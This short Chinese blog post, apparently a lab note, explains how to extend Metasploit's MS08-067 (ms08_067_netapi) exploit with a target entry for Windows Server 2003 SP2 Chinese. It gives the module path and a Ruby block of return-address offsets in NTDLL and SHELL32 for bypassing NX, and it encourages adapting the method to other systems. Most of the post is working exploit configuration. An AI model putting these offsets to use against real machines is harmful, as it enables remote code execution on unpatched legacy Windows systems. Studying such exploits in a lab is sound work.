---------------------

在ms08_067_netapi中添加2003的Chinese版本

///在我一次做实验的时候需要用到,但是我一直找不到Chinese的版本的,后来也找到了方法,如下

 

 

cd /usr/share/metasploit-framework/modules/exploits/windows/smb


找到ms08_067_netapi.rb文件


在ms08_067_netapi_ser2003_zh.rb中增加以下代码,其实就是修改了四个跳转指针地址(举一反三,其他系统。。。)。

 

 

['Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],

 

 

然后msfconsole启动,查看一下就好了

///就是这样子了,我也测试过了,没有问题

posted @ 2019-12-24 08:29  豆沙包的沙  阅读(310)  评论(0编辑  收藏  举报